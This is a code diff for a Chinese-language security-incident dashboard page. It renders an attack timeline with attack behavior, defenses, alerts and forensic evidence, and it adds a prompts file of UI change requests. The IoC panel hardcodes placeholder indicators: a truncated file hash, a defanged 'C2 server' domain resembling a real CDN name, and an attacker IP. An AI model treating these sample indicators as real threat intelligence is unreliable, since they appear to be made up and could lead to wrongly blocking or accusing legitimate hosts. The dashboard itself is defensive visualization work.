+ <div class="flex items-center mb-8">
483
+ <div class="w-16 h-16 rounded-full ${step.color} flex items-center justify-center mr-6">
484
+ <i class="fas fa-${step.icon} text-2xl"></i>
485
  </div>
486
  <div>
487
+ <h3 class="text-2xl font-semibold text-gray-800">${step.title}</h3>
488
+ <div class="flex items-center mt-1">
489
+ <span class="text-sm bg-gray-100 text-gray-800 px-3 py-1 rounded-full mr-3">阶段 ${step.id}</span>
490
+ <span class="text-sm text-gray-500"><i class="far fa-clock mr-1"></i>${step.time}</span>
491
+ </div>
492
  </div>
493
  </div>
494
 
495
+ <div class="grid grid-cols-1 lg:grid-cols-2 gap-8">
496
+ <div>
497
+ <div class="mb-8">
498
+ <h4 class="font-medium text-lg text-gray-800 mb-4 flex items-center">
499
+ <i class="fas fa-bug mr-2 text-gray-500"></i> 攻击行为分析
500
+ </h4>
501
+ <div class="bg-gray-50 p-5 rounded-lg border border-gray-200 text-base text-gray-700 leading-relaxed">
502
+ ${step.behavior}
503
+ </div>
504
+ </div>
505
+
506
+ <div class="mb-8">
507
+ <h4 class="font-medium text-lg text-gray-800 mb-4 flex items-center">
508
+ <i class="fas fa-shield-alt mr-2 text-gray-500"></i> 触发防御措施
509
+ </h4>
510
+ <div class="flex items-center bg-blue-50 p-4 rounded-lg border border-blue-200">
511
+ <div class="w-12 h-12 rounded-full bg-blue-100 flex items-center justify-center mr-4">
512
+ <i class="fas fa-${step.defenses.includes('邮件') ? 'envelope' : step.defenses.includes('终端') ? 'desktop' : step.defenses.includes('网络') ? 'network-wired' : step.defenses.includes('用户') ? 'user-shield' : step.defenses.includes('数据') ? 'database' : 'shield-alt'} text-blue-500"></i>
513
+ </div>
514
+ <div>
515
+ <h4 class="font-medium text-gray-800">${step.defenses}</h4>
516
+ <p class="text-sm text-gray-500 mt-1">检测时间 ${step.time}</p>
517
+ </div>
518
+ </div>
519
+ </div>
520
  </div>
521
+
522
+ <div>
523
+ <div class="mb-8">
524
+ <h4 class="font-medium text-lg text-gray-800 mb-4 flex items-center">
525
+ <i class="fas fa-exclamation-triangle mr-2 text-gray-500"></i> 安全告警
526
+ </h4>
527
+ <div class="space-y-4">
528
+ ${step.alerts.map(alert => `
529
+ <div class="p-4 rounded-lg border ${alert.severity === 'critical' ? 'bg-red-50 border-red-100' : alert.severity === 'high' ? 'bg-yellow-50 border-yellow-100' : 'bg-orange-50 border-orange-100'}">
530
+ <div class="flex items-start">
531
+ <div class="flex-shrink-0 mt-1 mr-3">
532
+ <i class="fas fa-${alert.severity === 'critical' ? 'exclamation-triangle text-red-500' : alert.severity === 'high' ? 'exclamation-circle text-yellow-500' : 'exclamation text-orange-500'} text-lg"></i>
533
+ </div>
534
+ <div>
535
+ <div class="font-medium text-gray-800 mb-1">${alert.severity === 'critical' ? '严重' : alert.severity === 'high' ? '高危' : '紧急'}告警</div>
536
+ <div class="text-sm text-gray-700">${alert.message}</div>
537
+ </div>
538
+ </div>
539
  </div>
540
+ `).join('')}
541
+ </div>
542
+ </div>
543
+
544
+ <div>
545
+ <h4 class="font-medium text-lg text-gray-800 mb-4 flex items-center">
546
+ <i class="fas fa-search mr-2 text-gray-500"></i> 取证证据
547
+ </h4>
548
+ <div class="bg-gray-50 p-5 rounded-lg border border-gray-200">
549
+ <div class="space-y-3">
550
+ ${step.forensic.map(item => `
551
+ <div class="flex items-start text-base">
552
+ <div class="flex-shrink-0 mt-1.5 mr-3">
553
+ <div class="w-2 h-2 rounded-full bg-gray-500"></div>
554
+ </div>
555
+ <div class="text-gray-700">${item}</div>
556
+ </div>
557
+ `).join('')}
558
  </div>
559
  </div>
560
+ </div>
561
  </div>
562
  </div>
563
 
564
+ <div class="mt-8 pt-6 border-t border-gray-200">
565
+ <h4 class="font-medium text-lg text-gray-800 mb-4">关联攻击指标(IoCs)</h4>
566
+ <div class="grid grid-cols-1 md:grid-cols-3 gap-4">
567
+ <div class="bg-gray-50 p-4 rounded-lg border border-gray-200">
568
+ <div class="text-sm font-medium text-gray-500 mb-2">恶意文件</div>
569
+ <div class="text-sm font-mono text-gray-800 break-all">SHA256: a1b2c3d4e5f6...</div>
570
+ </div>
571
+ <div class="bg-gray-50 p-4 rounded-lg border border-gray-200">
572
+ <div class="text-sm font-medium text-gray-500 mb-2">C2服务器</div>
573
+ <div class="text-sm font-mono text-gray-800">api.cloudfront[.]com</div>
574
+ </div>
575
+ <div class="bg-gray-50 p-4 rounded-lg border border-gray-200">
576
+ <div class="text-sm font-medium text-gray-500 mb-2">攻击者IP</div>
577
+ <div class="text-sm font-mono text-gray-800">45.67.89.123</div>
578
+ </div>
579
  </div>
580
  </div>
581
  </div>
 
589
  if (index < attackSteps.length - 1) {
590
  const arrow = document.createElement('div');
591
  arrow.className = 'arrow';
592
+ arrow.innerHTML = '<i class="fas fa-arrow-right text-xl"></i>';
593
  timelineContainer.appendChild(arrow);
594
  }
595
  });
prompts.txt CHANGED
@@ -1,2 +1,3 @@
1
  1、删除防御检测详情内容模块 2、将页面中的内容扩大,填满页面 3、攻击流程时间线模块 1)缩小节点展示,可以在流程中直接展示7个攻击节点 2)节点中不展示攻击行为内容和风险等级
2
- 攻击流程时间线:在保持原节点大小的情况下每个节点中增加攻击行为内容
 
 
1
  1、删除防御检测详情内容模块 2、将页面中的内容扩大,填满页面 3、攻击流程时间线模块 1)缩小节点展示,可以在流程中直接展示7个攻击节点 2)节点中不展示攻击行为内容和风险等级
2
+ 攻击流程时间线:在保持原节点大小的情况下每个节点中增加攻击行为内容
3
+ 2、将页面中的内容扩大,填满页面